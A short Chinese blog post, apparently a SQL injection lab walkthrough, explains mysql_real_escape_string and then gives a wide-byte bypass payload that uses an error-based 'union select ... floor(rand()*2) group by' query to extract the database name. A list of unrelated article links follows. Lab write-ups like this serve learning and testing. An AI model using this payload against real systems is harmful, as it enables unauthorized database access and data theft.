0X01 看看源码

what is mean?

定义和用法

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。

下列字符受影响:

    \x00

    \n

    \r

    \

    '

    "

    \x1a

如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。

语法

mysql_real_escape_string(string,connection)

参数     描述

string     必需。规定要转义的字符串。

connection     可选。规定 MySQL 连接。如果未规定,则使用上一个连接。

说明

本函数将 string 中的特殊字符转义,并考虑到连接的当前字符集,因此可以安全用于 mysql_query()。

同样用我们34+5关的方法绕过

正确的用户名

密码:�' union select count(*), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a#

0X02组合拳打法

切记 学习之路 少就是多

最新文章

  1. C# - JSON操作
  2. Google Map API 学习六-设置infoWindow的长宽
  3. 怎样成为一个游戏制作人——第五章:使用GGE图形库来写游戏
  4. oralce 获取自定义主键编码,有并发问题
  5. Linux离线安装Ruby详解
  6. Java面向对象 IO (四)
  7. ●BZOJ 4361 isn
  8. 2017ACM/ICPC广西邀请赛-重现赛 1010.Query on A Tree
  9. 新年 flag
  10. vue2.x + vux采坑总结(一)
  11. [PHP]一些坑
  12. 【maven】之nexus常用的一些配置
  13. 反转链表 Reverse Linked List
  14. ARM体系结构和汇编指令
  15. 多线程Java Socket编程示例
  16. 查询系统日期和时间(mysql)
  17. 虚拟机上linux与windows之间复制粘贴
  18. 算法练习(js)
  19. Bootstrap从入门到放弃
  20. restful的认识和用法

热门文章

  1. MySQL 用 limit 为什么会影响性能?
  2. 【7.10校内test】T2不等数列
  3. java实现顺序队列
  4. aop设计原理(转)
  5. 剑指offer-二进制中1的个数-进制转化-补码反码原码-python
  6. LeetCode题目(python)
  7. git 笔记总结
  8. Jdbc Driver驱动和ServerTimeZone时区的的问题
  9. vue实现轮播图
  10. scala 从头越